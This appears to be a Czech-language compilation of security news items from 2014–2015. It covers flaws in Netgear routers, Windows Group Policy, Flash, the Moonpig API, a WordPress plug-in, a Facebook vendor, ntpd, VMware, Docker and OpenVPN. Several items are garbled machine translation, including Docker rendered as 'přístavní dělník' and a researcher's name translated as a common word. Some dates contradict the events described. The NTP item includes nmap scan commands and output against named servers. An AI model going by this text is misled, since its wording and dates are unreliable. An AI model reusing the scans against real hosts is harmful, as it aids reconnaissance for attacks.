Peter Adkins našel způsob, jak z těchto routerů získat heslo administrátora nebo informace o WiFi připojení. Stačí být připojený v síti, nebo pokud má router povolenou správu přes WAN, stačí znát jeho IP adresu.

Zranitelnost spočívá ve službě SOAP využívané pro komunikaci s aplikací NetGear Genie. V základu je tato služba filtrovaná, ale upravený HTTP požadavek to jednoduše obejde.

V domácí síti to asi nebude představovat tak závažný problém, ale u WiFi sítí ve veřejných prostorech tak mohou klienti změnit nastavení WiFi sítě. Pokud někdo používá administraci přes WAN (ve výchozím nastavení vypnutou), je velmi vážně ohrožen.

Adkins na chybu Netgear upozornil, jeho dosavadní reakce ale tuto chybu neberou jako závažnou. Nahlášenou chybu Netgear uzavřel jako nevyžadující zásah.

Kritickou chybu ve Windows má Microsoft, ohrožené miliony strojů

13.2.2014 Zranitelnosti
Microsoft vydal v úterý kritickou záplatu pro Windows, která opravuje nebezpečnou zranitelnost, díky níž útočníci mohli převzít na dálku plnou kontrolu nad systémy nic netušících uživatelů. Oprava pro Windows Server 2003 však vydaná nebude.

Vývoj a testování aktualizace pro chybu přezdívanou jako JASBUG, trval více než rok a byla díky ní zpřísněna mimo jiné i Skupinová politika (Group Policy), což je funkce, která umožňuje organizacím centrálně spravovat systémy s Windows.

Díra byla podle bezpečnostní konzultantské společnosti JAS Global Advisors ukryta přímo ve Skupinové politice po více než deset let. JAS Global Advisors spolu se společností simMachines o existenci díry informoval Microsoft v lednu 2014.

„Narozdíl od známých děr jako Heartbleed, Shellshock, Gotofail a POODLE je tato díra obsažena přímo ve struktuře Skupinové politiky,“ uvedl na svých webových stránkách JAS. Aby ji mohl opravit, musel proto Microsoft předělat klíčové komponenty svého operačního systému a přidat několik nových funkcí.

Microsoft se tomuto bezpečnostnímu riziku věnoval v bulletinu MS15-011. Inženýři amerického gigantu na blogu vysvětlili, že útočníci tyto díry zneužívali za použití technik jako ARP spoofing na lokální síti, díky nimž přiměli počítače akceptovat a aplikovat špatné nastavení Skupinové politiky ze serverů, které měli pod kontrolou.

Při úspěšném zneužití díry byli útočníci schopni na dálku na počítače instalovat programy, měnit data nebo vytvářet nové účty. JAS plánuje vydat techničtější podrobnosti o zmíněné díře později v tomto měsíci.

Microsoft ve snaze zabránit útokům přinesl na systémy s aktualizací MS15-011 novou funkci zvanou jako UNC (Universal Naming Convention) Hardened Access. Ta vyžaduje, aby se klient i server autentifikovali před tím, než klient přistoupí k obsahu UNC (jímž jsou například data Skupinové politiky) na serveru.

I když problém postihuje všechny podporované verze Windows, Microsoft se rozhodl, že patch nevydá pro Windows Server 2003, jehož podpora bude ukončena 14. července.

Podle Microsoftu nemělo smysl vytvářet záplatu i pro Windows Server 2003, jelikož by musel být předělán nejen komponent Skupinové politiky, ale i další významné části operačního systému. Kvůli tomu by pak mohly vzniknout problémy s kompatibilitou u aplikací, jež byly navrženy přímo pro Windows Server 2003.

I když toto odůvodnění dává smysl, řada firem používajících Windows Server 2003 až do července i nadále očekává vydávání bezpečnostních aktualizací. Na tomto operačním systému běží po celém světě stále miliony počítačů a analytici předpovídají, že jejich migrace na novější verzi OS bude obtížná, jelikož okolo zastaralého OS firmy postavily celý „ softwarový ekosystém“.

Flash Player obsahuje kritickou chybu, už třetí během měsíce

3.2.2015 Zranitelnosti
Společnost Adobe Systems varovala uživatele před hackery, kteří zneužívají zranitelnost ve Flash Playeru, pro niž zatím není dostupná žádná záplata, k infikaci systémů škodlivým červem.

Jde již o třetí tzv. zero day zranitelnost ve Flash Playeru, o níž Adobe během uplynulých třiceti dnů informovalo. Podle dostupných informací je nová chyba aktivně zneužívána hackery, kteří cílí na uživatele s webovými prohlížeči Internet Explorer a Mozilla Firefox na Windows 8.1 a nižším. Podle oficiálního vyjádření Adobe bude záplata pro Flash Player vydána ještě v tomto týdnu.

Zranitelnost, která je označována jako CVE-2015-0313, postihuje Flash Player na všech podporovaných platformách: Adobe Flash Player 16.0.0.296 a starší verze na Windows a Mac OS X a Adobe Flash Player 11.2.202.440 a starší verze pro Linux.

Podle Adobe na chybu upozornili experti ze společností Trend Micro a Microsoft, kteří zjistili, že je zneužívána k útokům.

Zranitelnost je zneužívána tak, že se uživateli zobrazí podvodná reklama ve Flashi. Pokud na ni uživatel klikne, je jeho počítač infikován. Podle expertů z Trend Micro se tyto reklamy objevují například na populárním webu pro sdílení videí dailymotion.com.

„Je pravděpodobné, že útok nebude cílen pouze na webovou stránku Dailymotion, jelikož infekce pochází z reklamní platformy, ne z obsahu webové stránky jako takové,“ uvedl Peter Pi z Trend Micro. „Útoky sledujeme od 14. ledna,“ dodal Pi s tím, že většina postižených uživatelů pochází ze Spojených států.

Adobe v uplynulých dvou týdnech vydalo pro Flash Player dvě aktualizace: Flash Player 16.0.0.287 a 16.0.0.296, které opravují dvě zranitelnosti ve Flash Playeru aktivně zneužívané hackery. Podpora těchto dvou chyb označovaných jako CVE-2015-0310 a CVE-2015-0311, byla přidána do hackerského nástroje s názvem Angler Exploit Kit. Z analýzy Trend Micro vyplývá, že při útocích pomocí Angleru je využíván i CVE-2015-0313.

Podle nezávislého odborníka, který na internetu vystupuje jako Kafeine, však útočníci nejnovější díru ve Flash Playeru zneužívají také pomocí nástroje Hanjuan Exploit Kit. Ať už je díra zneužívána kterýmkoli nástrojem, uživatelé by si před tím, než Adobe vydá záplatu, měli dávat pozor.

Podvodné reklamy je obtížné blokovat, jelikož jsou zobrazovány skrze legitimní reklamní platformy a na populárních webových stránkách, kterým uživatelé věří.

Uživatelé by si ve svých prohlížečích měli zapnout funkci "click-to-play", která zabrání automatickému spuštění Flashe bez jejich souhlasu a kromě toho by měli udržovat aktualizované i své antivirové systémy.

Moonpig API Vulnerability vystaví platební karty data
7.1.2014 Zranitelnosti
Moonpig, UK-založená společnost, která prodává osobní pohlednice, hrnky, trička a další novinky, byl převezen do kůlny pro chudé postupy zabezpečení výzkumníkem, který tvrdí, že je to jednoduché ukrást uživatele a platební karty dat přes rozviklanou mobil app API.

Společnost dnes ráno řekl, že jeho Threatpost aplikace budou k dispozici, když to vyšetřuje problém.

"Jsme si vědomi tvrzení dnes ráno, pokud jde o bezpečnost dat zákazníka v rámci našich aplikací," řekl zástupce Moonpig. "Můžeme vás ujistit naše zákazníky, že všechny hesla a platební údaje jsou a vždy byla v bezpečí. Bezpečnost vašich zážitek z nakupování v Moonpig je pro nás velmi důležitá a my se vyšetřuje detail za dnešní zprávě jako prioritu. "

Tak tomu může být, ale výzkumník Paul Cena, který včera zveřejněny zející díry v Moonpig.com, řekl, že před 17 měsíci oznámil záležitost firmy na 18.srpna 2013,.

"Po několika e-mailů tam a zpět, jejich uvažování byl kód dědictví a oni si" si hned na to, '"Cena napsal ve svém zveřejnění . Následné e-mailové konverzace s Moonpig v září odhalila problém zůstal nevyřešen, ale bylo by "před Vánocemi," řekl Price. Včera se rozhodl Moonpig měl dost příležitostí, aby tento problém vyřešit.

"Původně jsem chtěl počkat, až budou stanovena jejich živá koncové body, ale vzhledem k časové horizonty jsem se rozhodl publikovat tento příspěvek donutit Moonpig opravit problém a chránit soukromí svých zákazníků (kdo ví, kdo ještě ví o tom!), "napsal cena. "17 měsíců je více než dost času, jak opravit problém takhle. Zdá se, že osobní údaje zákazníka není prioritou Moonpig. "

Ceny díla se točí kolem aplikace pro Android a žádostmi na API Moonpig je. Cena citoval řadu otázek kolem očí bijící nedostatek autentizace a schopností manipulovat ID zákazníka vrácené prostřednictvím URL parametr, který by mohl útočníkovi umožnit teoreticky naučit osobní i platební informace pro každého z Moonpig tří milionů zákazníků.

"Uhodil jsem se uživatelům vyzkoušejte několik stokrát v rychlém sledu, a nebyl jsem na míře," řekl Price. "Vzhledem k tomu, že ID zákazníků jsou sekvenční útočník by si to velmi snadné vybudovat databázi zákazníků Moonpig spolu s jejich adresami a detaily karty během několika hodin. - Velmi děsivé opravdu"

Vzhledem k tomu, tuto schopnost zosobnit uživatele pomocí postupných ID zákazníka, Cena řekl útočník mohl získat profil a karty informace, místo a prostudujte objednávky a další. Poznamenal také, API metoda s názvem GetCreditCardDetails kterou používaných při testu identifikace zákazníka, který vytvořil, který se vrátil poslední čtyři číslice číslo karty, datum expirace a jméno klienta.

Cena také experimentoval s snaží najít skryté metody API zasláním neznámou metodu. To, co se dostal na oplátku byl 404 s odkazem na stránky nápovědy se seznamem všech Moonpig které jsou k dispozici metody a popisy každého.

"Stránka nápovědy také odhaluje své vnitřní nastavení sítě DNS, ale to je jiný příběh," řekl Price.

On to na vědomí, že API podporuje OAuth 2.0 povolení, které by zacelil mezeru.

Moonpig neposkytl časový plán pro získání jejích aplikací on-line, a řekl, že jeho pracovní plochy a mobilních staveništích nebyly ovlivněny.

WordPress Symposium Plug-In sužován souborů Nahrát chyby zabezpečení
2.1.2014 Zranitelnosti

Vzhledem k tomu, zpřístupnění vážné souboru nahrání zranitelnosti v WordPress sympozia a veřejnou dostupnost proof-of-concept kód zneužití, útoky proti lokalit se systémem plug-in se začínají zvyšovat obavy.

Výzkumníci z Trustwave SpiderLabs v úterý uvedlo, že ulovil několik pokusů využít v jejich honeypot, a výzkumníci na Sucuri byly monitorovací skeny pro plug-in od začátku měsíce, téměř dva týdny před 11.prosince zveřejnění by Italský vědec Claudio Viviani.

Tato chyba zabezpečení umožňuje útočníkovi vkládat bez ověření na stránky běží Symposium, SpiderLabs vedoucí výzkumník Ryan Barnett napsal v poradenství .

V jednom takovém využívat pokus, Barnett řekl útočník nahrál PHP soubor, který obsahoval různé PHP backdoor kód, jehož prostřednictvím hacker mohl poslat příkazy přes HTTP. Soubor také WSO webshell, který poskytuje vzdálený pohled do rozhraní pro správu serveru je.

Podle statistik WordPress, plug-in byl trochu staženo více než 150.000 krát, což je nesrovnatelně menší než některé z více populární plug-iny jako Aksimet (27 milionů stažení) a kontaktní formulář 7 (22000000). I přes relativně nízký počet stažení, veřejná dostupnost PHP kód zneužití a snadnost, ve kterém hackeři jsou schopni lokalizovat místa spuštěním zranitelné zásuvné-in zaslouží operátoři na místě vyhodnotí riziko.

"Konečným cílem většiny z těchto útočníků je instalace webshell / zadní vrátka, aby mohli mít přístup / kontrolu na webových stránkách," řekl Barnett Threatpost. "Sledují noví 0-day zranitelnosti využít, aby pak nainstalovat webshells. WP-Symposium je prostě "vuln dne."

WSO webshell se hackeři použit před cílem získat dálkové ovládání přes webové stránky; webshell umožňuje útočníkům vzdáleně číst a databází, spouštět příkazy na úrovni OS, nainstalujte drive-by download-malware vazby a dokonce útočit na jiné webové stránky, řekl Barnett.

Skládání problému je fakt, že i přes aktualizované verze plug-in jsou k dispozici, Barnett řekl problém přetrvává.

"Stáhnul jsem si nejnovější verzi kódu jak z webových stránek WordPress a přímo z wpsymposium místa , a ověří, že je stále zranitelný, "řekl Barnett.

Nejnovější verze WordPress sympozia z WordPress a WPSymposium stránkách jsou stále zranitelné.

Tweet
Barnett řekl, že ohrožené soubory, jsou také k dispozici na mobilní verzi. Tyto soubory jsou: /wp-symposium/server/php/index.php; /wp-symposium/server/php/UploadHandler.php; /wp-symposium/mobile-files/server/php/index.php; a /wp-symposium/mobile-files/server/php/UploadHandler.php.

Výzkumníci z Sucuri uvedlo, že byli schopni ověřit, podobné útoky proti stránek běžících sympozium. Sucuri hlásí nárůst internetových scanů pro plug-in začíná počátkem tohoto měsíce, a to zejména poté, co 11.prosince, kdy chyba byla veřejně známá. Počet skenů za den vyvrcholil v pondělí na téměř 3.800. Sucuri řekl, že první dva využije byl učiněn pokus o 1.prosince a 9.prosince, dva dny před zveřejněním.

"Někdo tam věděl o této chyby zabezpečení a aktivně se pokouší ji využít," napsal Sucuri David Dede v poradenství . "Ať už to bylo zveřejněno přes podzemní fór, jsou to právě ony, které ji nebo nějakým jiným způsobem nalezeny. Ať tak či onak, máme co do činění s aktivní 0 dnů zranitelnost. "

XXE Bug opravené na Facebooku Kariéra Third-Party Service
2.1.2014 Zranitelnosti
Zranitelnost byla objevena a záplatované ve službě třetí strany, která zpracovává životopisy na povolání stránce na Facebooku je.

Objev byl v hodnotě více než 6000 dolar na odměnu vyplatil Facebooku výzkumníka Mohamed Ramadan Egypta, který publikoval některé podrobnosti o zranitelnosti a využít na jeho internetových stránkách .

Ramadán řekl, že chyba je slepý XXE (XML externí subjekt) mimo pásmo chyby. To mu umožnilo nahrát DOCX soubor ke stránce kariéry s některými dalšími kódem, který nebyl prověřeni službou třetí strany.

Stránka kariéry přijímá pokračuje pouze ve formátu PDF nebo DOCX formátu. Ramadan řekl, že byl schopen použít program 7zip extrahovat obsah XML souboru DOCX, že si vytvořil. Ten otevřel soubor s názvem [Content_Types] .xml a vloží benigní kód, který mu nahrál na stránku. Kód, řekl, spojený s jeho python HTTP server o 15 minut později.

Ramadan řekl, že zatímco jeho útok kód byl neškodný, hacker mohl provádět libovolný počet škodlivých aktivit, včetně útoku denial-of-service na rozebrat systému, provádí prověřování TCP pomocí externích subjektů HTTP, získat neoprávněný přístup k datům uloženým as XML soubory, provádět denial-of-service útoky na jiných systémech, přečtěte si systém a soubory aplikací, spustit další kód, nebo pomocí připojené aplikace pro DDoS útoky.

Vzhledem k tomu, služby třetích stran, však nebyla součástí Facebook výrobního prostředí, uživatelských dat nebo Facebook zdrojový kód by neměl být ohrožen.

Není to poprvé, co Ramadan byl odměněn Facebook odměnu. V říjnu 2013 se našel zranitelnost v aplikace Facebook Messenger pro Android , která umožňuje jinou aplikaci na zařízení pro přístup k uživateli přístup k Facebooku žeton a převzít ji v úvahu, a podobné chyby ve Facebook Pages Manager pro Android, což je aplikace, která umožňuje administrátorům spravovat více účtů Facebook. Tato chyba umožňuje další aplikace chytit přístupový token uživatele.

Facebook se před řešit XXE chyby. V lednu se vyplácel 33500dolar kvantum do brazilské výzkumník, který našel XXE zabezpečení v Facebook je Zapomněli jste heslo služby . Ten oznámil XXE chybu a požádal o svolení Facebook vystupňovat ji do vzdáleného spuštění kódu chybu. Facebook se rychle záplatované, ale Silva sdílel jeho potenciál využít s bezpečnostním týmem na Facebooku, který se rozhodl, že si vysloužila velkou odměnu.

Kritický #NTP Chyba ntpd před 4.2.8
28.12.2014 Zranitelnosti
Bezpečnostní tým Google objevil několik chyb v běžných implementacích NTP, z nichž jedna může vést ke spuštění kódu [1] [2]. NTP servery předchozí verze 4.2.8 jsou ovlivněny.

Tam jsou některé zvěsti o aktivní využití alespoň některé z těchto zranitelností objevených Google.

Ujistěte se, že na opravu všechny veřejně dostupné implementace NTP tak rychle, jak je to možné.

Polehčující okolnosti:

Zkuste blokovat příchozí připojení NTP serverům, které nemají být veřejně dostupné. Je však třeba si uvědomit, že jednoduché Statefull firewally nemusí sledovat UDP spojení správně a umožní přístup k interním serverům NTP z libovolného externího šetření, pokud je server NTP nedávno založila odchozí spojení.

ntpd obvykle nemusí běžet jako root. Většina verzí Unix / Linux se bude konfigurovat NTP používat nižší privilegovaných uživatelů.

Podle poradenství v ntp.org, můžete si také:

Zakázat autokey ověřování tím, že odstraní, nebo komentáře, veškeré konfigurační direktivy začínající kryptografické klíčové slovo v ntp.conf souboru.

Několik Ubuntu a CentOS systémy jsem testoval, stejně jako OS X systémy, nezdá se, že používat autokey.

[1] http://www.kb.cert.org/vuls/id/852879
[2] http://support.ntp.org/bin/view/Main/SecurityNotice

CVE Náraz Podrobnosti
CVE-2014-9293 ověření pravosti NTP vytvoří slabý klíč, pokud nikdo je k dispozici v konfiguračním souboru.
CVE-2014-9294 ověření pravosti NTP-keygen používá slabý semeno k vytvoření náhodných klíčů
CVE-2014-9295 vzdálené spuštění kódu Vzdálený útočník může poslat pečlivě budovaný paket, který může přetečení zásobníku vyrovnávací paměti a potenciálně umožnit škodlivý kód, který má být proveden s úrovní oprávnění v ntpd procesu.
CVE-2014-9296 chybí chybová zpráva V kódu NTP, část kódu chybí návrat, a výsledná chyba označuje zpracování nezastavil.

Jaké NTP servery potřebujete opravit?
28.12.2014 Zranitelnosti
( Podívejte se také na dřívější deník o této chybě )

Zatímco lidé obecně vědí, kde jejich "skutečné" servery NTP jsou všichni často nevědí, že mám vor "náhodných" NTP serveru - boxy, které mají NTP povoleno bez systémových správců o tom věděli. Společné serverů v síti, jako směrovače nebo přepínače (často, když se jedná o klienty NTP, ale jsou také servery NTP), PBX a VoIP brány, poštovní servery, certifikačních autorit, a tak dále.

V těchto dnech automatické aktualizace, by si myslíte, že většina serverů NTP by být oprava proti zranitelností nalezených tým Google a popsané v příběhu napsána Johannes dnes večer.

Nicméně to trvalo jen do druhé hostitel zkontrolovat zjistit velmi zastaralé serveru. Bohužel, to je hlavní NTP server velkého kanadského ISP (Jejda). To, co jsem také našel po cestě bylo, že mnoho serverů hlásí "4", jako verze, a to z -sV spínače, ne z NTP-info. Takže v závislosti na vašich interních serverů a jak jsou nastaveny, může to být čas, abychom začali používat ověřená skenování pomocí nástrojů jako je Nessus získat verze služby pro naše servery NTP. Doufejme, že je to praxe pro ostatní služby již.

Všimněte si, že IP adresy v těchto skenů jsou popletl

C: \> nmap -Su -pU: 123 -sV ntp.someisp.ca --script = NTP info.nse

Spuštění Nmap 6.47 (http://nmap.org) v 2014-12-19 21:44 východního standardního času

Detekce prováděné služby. Nahlaste nám prosím jakékoliv nesprávné výsledky na adrese http: //. Nmap
org / odeslat /.
Nmap udělat: 1 IP adresa (1 hostitel nahoru) naskenovány 180,08sekunda

Tento server na druhé straně, nehlásí verzi v NTP-info výstup. "-sV" Hlásí verze 4, ale to je všechno, co jsme si.

C: \> nmap -Su -pU: 123 -sV time.someotherserver.com --script = NTP info.nse

Spuštění Nmap 6.47 (http://nmap.org) v 2014-12-19 22:17 východního standardního času

Nmap skenování zpráva za time.someotherserver.com (rr)
hostitel je nahoru (0.010s latence).
PORT STATE SERVICE VERZE
123 / udp open NTP NTP v4
| NTP-info:
| _ dostávat časové razítko: 2014-12-20T03: 19 : 39

Detekce prováděné služby. Nahlaste nám prosím jakékoliv nesprávné výsledky na adrese http: //. Nmap
org / odeslat /.
Nmap udělat: 1 IP adresa (1 hostitel nahoru) naskenovány 143,24sekunda

Ale opravdu, po tomto roce vulnerabilties, které jsme viděli v základních systémových služeb, je na čase, aby lidé vzal "SANS Top 20" na srdce - rozhodující Controls SANS, že byste opravdu měli být při pohledu na, pokud je to váš cíl zajistit síť - https://www.sans.org/critical-security-controls. Top 5 v seznamu shrnout první linii obrany proti věci, jako je tento. Víte, co je na vaší síti, vědět, co se běží na to, že mají formální program oprav a aktualizací, a pravidelně vyhledává nové hostitele, nových služeb a nových zranitelností. Pokud je to vaše myšlenka, že jediný skenování pro tuto jednu chybu zabezpečení, je nejdůležitější věc na vašem talíři (nebo skenování pro heartbleed nebo Shellshock byl na začátku tohoto roku), pak jste již ztratil - to je čas, aby přezkoumala kritické prvky SANS a předělat svůj IT a bezpečnostních operací.

Quick Dodatek / Update (Johannes):

CentOS a dalších distribucích Linuxu dělali vydání aktualizace. Nicméně, může řetězec verze nezmění. Podívejte se na "Datum sestavení". Například na CentOS 6:
Před patche: ntpd 4.2.6p5@1.2349-o Sat 23.listopadu 18:21:48 UTC 2013 (1)
Po opravě: ntpd 4.2.6p5@1.2349-o Sat 20.prosince 02:53:39 UTC 2014 (1)

Dva VMWare aktualizace zabezpečení vCloud Automation Center a AirWatch
12.12.2014 Zranitelnosti
Máme dvě bezpečnostní aktualizace od společnosti VMware tento týden:

VMWare ID CVE Produkt Podrobnosti
VMSA-2014-0013 CVE-2014-8373 VMware vCloud Automation Center Remote privilegium eskalace zranitelnost. Ověření vzdálení uživatelé mohou získat oprávnění správce. Zmírněno vypnutím "Connect (by) pomocí VMRC"
VMSA-2014-0014 CVE-2014-8372 AirWatch Přímý předmět reference zranitelnost umožňuje uživatelům vidět navzájem informace.

VMSA-2014-0013 (CVE: http://www.vmware.com/security/advisories/VMSA-2014-0013.html

Nová verze Docker řeší kritické chyby, aktualizujte ihned
6.12.2014 Zranitelnosti
Pokud používáte přístavní dělník, open source platformu pro stavebnictví, dopravy a provoz distribuovaných aplikací na téměř libovolné platformě, nezapomeňte aktualizovat na nejnovější verzi (v1.3.2), protože všechny předchozí sport kritickou chybu, která může být zneužita by útočníkovi získat zvýšená oprávnění spustit škodlivý kód na dálku. aktualizace byla vydána v pondělí - pro všechny podporované platformy - a je možné vyzvednout tady . "Motor Docker, až do verze 1.3.1, byla citlivá na extrahování souborů svévolným drah na hostitele při "přístavní dělník pull" a "přístavní dělník zatížení" operace. To bylo způsobeno tím, symbolický odkaz a pevný odkaz traversals přítomných při těžbě obrazu přístavní dělník je, "společnost za software vysvětlil problém ve zpravodaji zabezpečení . "Docker 1.3. 2 nápravy této chyby zabezpečení. Další kontroly byly přidány do pkg / Archiv a extrakce obrazu se nyní provádí v chrootu. No náprava je k dispozici pro starší verze Docker a uživatelé se doporučuje provést upgrade, "naléhali, nejnovější verze také řeší kritická chyba, která by mohla vést k eskalaci kontejneru, a obsahuje několik dalších změn, které zlepší použitelnost. Objev eskalaci práv zranitelnost (CVE-2014-6407) byl přičítán Florian Weimer z bezpečnostního týmu Red Hat a nezávislý výzkumník Tonis Tiigi.

VMware nové a aktualizované bezpečnostní zprávy
6.12.2014 Zranitelnosti

Dnes VMware vydala následující nové a aktualizované bezpečnostní
pokyny:

1-VMSA-2014 - 0012

Shrnutí

Aktualizace produktu VMware vSphere řešit problém, Cross Site Scripting, problém je ověření certifikátu a bezpečnostní chyby v knihoven třetích stran.

Příslušné zprávy:

VMware vCenter Server Appliance 5.1 Před Aktualizace 3

VMware vCenter Server 5.5 před Aktualizace 2
VMware vCenter Server 5.1 před Aktualizace 3
VMware vCenter Server 5.0 před Aktualizujte 3c

VMware ESXi 5.1 bez záplat ESXi510-201412101-SG

Popis problému
. VMware vCSA cross-site scripting zranitelnost
b. vCenter Server problém ověření certifikátu
c. Aktualizace na ESXi libxml2 balíčku
d. Aktualizace na ESXi Curl balíčku
e. Aktualizace na ESXi Python balíček
f. vCenter a Update Manager, Oracle JRE 1.6 Aktualizace 81

http://www.vmware.com/security/advisories/VMSA-2014-0012.html

2-VMSA-2014-0.002,4

Shrnutí

VMware vSphere aktualizoval třetích stran knihoven.
Příslušné zprávy
vCenter Server Appliance 5.5 před 5.5 Aktualizace 1
vCenter Server Appliance 5.1 před 5.1 Update 3

VMware vCenter Server 5.5 před 5.5 aktualizace 1

VMware Update Manager 5.5 před 5.5 aktualizace 1

VMware ESXi 5.5 bez záplat ESXi550-201403101-SG
VMware ESXi 5.1 bez záplat ESXi510-201404101-SG
VMware ESXi 5.0 bez záplat ESXi500-201405102-SG
VMware ESXi 4.1 bez záplat ESXi410-201404401-SG
VMware ESXi 4.0 bez záplat ESXi400-201404401-SG VMware ESX 4.1 bez náplasti ESX410-201404402-SG VMware ESX 4.0 bez záplat ESX400-201404402-SG

Popis problému:

. DDoS zranitelnost v NTP třetí strany knihoven
b.Update na ESXi glibc balíku
C. vCenter a Update Manager, Oracle JRE 1.7 Aktualizace 45

Další podrobnosti naleznete na: http://www.vmware.com/security/advisories/VMSA-2014-0002.html

3-VMSA-2.014-0008,2
Shrnutí
VMware vSphere aktualizovala třetí strana knihoven
Příslušné zprávy
VMware vCenter Server 5.5 před aktualizaci 2
VMware vCenter Server 5.1 před Aktualizace 3
VMware vCenter Server 5.0 před Aktualizujte 3c

VMware vCenter Update Manager 5.5 před Aktualizujte 2

VMware ESXi 5.5 bez záplat ESXi550-201409101-SG
VMware ESXi 5.1, aniž by oprava ESXi510-201412101-SG Popis problému a. vCenter Server Apache Struts aktualizace b. vCenter Server tc-server 2.9.5 / Apache Tomcat 7.0.52 aktualizace c. Aktualizace na ESXi glibc balíčku d. vCenter a Update Manager, Oracle JRE 1.7 Aktualizace 55

Další informace naleznete na: http://www.vmware.com/security/advisories/VMSA-2014-0008.html

OpenVPN serveru DoS zranitelnosti pevné
3.12.2014 Zranitelnosti
OpenVPN lidé vydala informační zpravodaj zabezpečení včera a aktualizace svého serverového softwaru na zranitelnost, který existoval ve zdrojovém kódu od roku 2005. CVE-2014 - 8104, je zranitelnost, která může vést k serveru OpenVPN zřítilo při poslal příliš krátký ovládání kanálů paketu. Všimněte si, že v jejich slov "certifikáty klienta a TLS Díla bude chránit před to využít, pokud všichni klienti OpenVPN lze věřit, že neměla být ohrožena, a / nebo škodlivé." Když čtu to správně, to znamená, že přidání "TLS-auth <keyfile> (0 | 1). "(Podle potřeby) a konfiguračních souborů na obou serverem a klientem, stejně jako použití klientských certifikátů by měly chránit před tímto útokem Lidi běží OpenVPN server se důrazně doporučuje aktualizovat v2.3.6 co nejdříve. opravy byly také backported na v2.2 a lze je nalézt v git repozitáře, ale mohou také existovat v dřívějším v2.x kódu, jestli je někdo stále běží starý serverový software. Všimněte si, že v3.x kód používaný ve většině klientů OpenVPN Connect (jako například pro Android a iOS), nejsou ohroženy. Moje systémy Ubuntu dostal aktualizaci v noci, takže pokud používáte server OpenVPN na Linuxu doufejme záplaty jsou k dispozici na obvyklých aktualizace balíčku mechanismu nebo brzy bude.

Microsoft zdroje otevřeného .NET Server stack
21.11.2014 Zranitelnosti
Microsoft open zdrojů full server-side .NET stack a rozšířený .NET pro běh na platformách Linux a Mac OS. Společnost také vydala Visual Studio společenství 2013, novou bezplatnou edici Visual Studio, která poskytuje snadný přístup k Visual Studio základní sady nástrojů. plní svůj slib podporovat rozvoj cross-platformní, Microsoft poskytuje plnou .NET serveru stack v open source včetně ASP.NET, .NET kompilátor, .NET Runtime jádra, rámce a knihoven, které umožňují vývojářům vytvářet s .NET přes Windows, Mac nebo Linux. Díky této implementaci Microsoft bude úzce spolupracovat s open source komunitou, přičemž příspěvky na budoucí zlepšení na .NET a bude fungovat prostřednictvím .NET nadace . "Dnešní open source oznámení znamená, že vývojáři budou mít plně podporován, plně open source, plně multiplatformní .NET zásobník pro vytváření serverů a cloud aplikací - včetně všeho od C # / VB kompilátory, na CLR běhu na základních .NET základní třídy knihovny, na vyšší úrovni .NET Web, dat a rozhraní API rámce, " vysvětlil Scott Guthrie, výkonný viceprezident skupiny Cloud a podnikání ve společnosti Microsoft. "Jsme uvolnění zdroj pod MIT open source licencí a také vydáním explicitní patent slib vyjasnit uživatelům patentových práv na .NET." Microsoft také vydal Visual Studio Společenství 2013, zdarma, plně vybavený edice Visual Studio včetně plné rozšiřitelnost , Zaměření na jakékoli platformě, od zařízení a plochy, na webových a cloudových služeb, Community Edition poskytuje vývojářům snadný přístup k Microsoft Visual Studio sadu nástrojů pro všechny nonenterprise vývoj aplikací. Vývojáři mohou začít s Visual Studio 2013 Společenství zde . Pro další podporu křížové platforma mobilní vývoj s .NET, jako součást svého strategického partnerství, Microsoft a Xamarin oznámil nové zjednodušené prostředí pro instalaci Xamarin z Visual Studio, stejně jako oznámila přidání Visual Studio podporu pro své volné nabídky Xamarin Starter Edition - k dispozici později v rok. Kromě toho, pro webové vývojáře se zájmem o budování cloud-poháněl aplikace, které se zaměřují na mobilní zařízení, Microsoft vydal finální verzi Apache Cordova nástrojů. Vývojáři mohou začít Visual Studio 2015 Preview zde .

Kritická WordPress XSS aktualizace
21.11.2014 Zranitelnosti
Dnes Wordpress 4.0.1 byl propuštěn, který řeší kritické XSS zranitelnost (mimo jiné zranitelnosti). [

XSS zranitelnost zaslouží trochu více pozornosti, protože je až příliš častým problémem, a často podceňován. Za prvé, proč je XSS "kritická"? To neumožňuje přímý přístup k datům, jako je SQL Injection a neumožňuje spuštění kódu na serveru. Nebo ne?

XSS neumožňuje útočníkovi modifikovat HTML na webu. S tím může útočník snadno upravit formulář tagy (myslet na přihlašovací formulář, změna URL Tvrdí, že je to data) nebo útočník mohl použít XMLHttpRequest provádět CSRF aniž by byla omezena stejným politiky původu. Útočník bude vědět, co píšete, a budou moci změnit to, co píšete, tak ve zkratce: Útočník je plně pod kontrolou. To je důvod, proč XSS se děje.

Konkrétní problém zde byl, že Wordpress umožňuje určité omezené HTML tagy v komentářích. To je vždy velmi nebezpečný podnik. Tiskové vývojáři slovo se pokusí zavést nezbytné záruky. Že jen některé tagy jsou povoleny, a dokonce i pro tyto značky, kód zkontrolovat nebezpečných vlastností. Je smutné, že tato kontrola nebyla provedena zcela v pořádku. Nezapomeňte, že prohlížeče bude také analyzovat poněkud chybně HTML pohodě.

Lepším řešením by byly pravděpodobně používat standardní knihovnu místo toho se snaží, aby to sami. HTML čistička je jedna taková knihovna pro PHP. Mnoho developer odrazuje od používání, jak to je docela objemný. Ale je to objemný z důvodu: to se snaží pokrýt co nejvíce půdy. Je to nejen normalizuje HTML a eliminuje chybně HTML, ale také poměrně flexibilní konfigurační soubor. Mnoho "lehké" alternativy, jako je řešení Wordpress přišel s, spoléhat se na regulárních výrazech. Regulární výrazy jsou obvykle není ten správný nástroj analyzovat HTML. Příliš mnoho se může pokazit od nových linek a končí někde kolem multi-byte znaky. Stručně řečeno: Nepoužívejte regulární výrazy analyzovat HTML (nebo XML), zejména pokud jde o bezpečnost.

[1] https://wordpress.org/news/2014/11/wordpress-4-0-1/

Nejnovější Microsoft záplaty zásadní pro všechny uživatele systému Windows
20.11.2014 Zranitelnosti
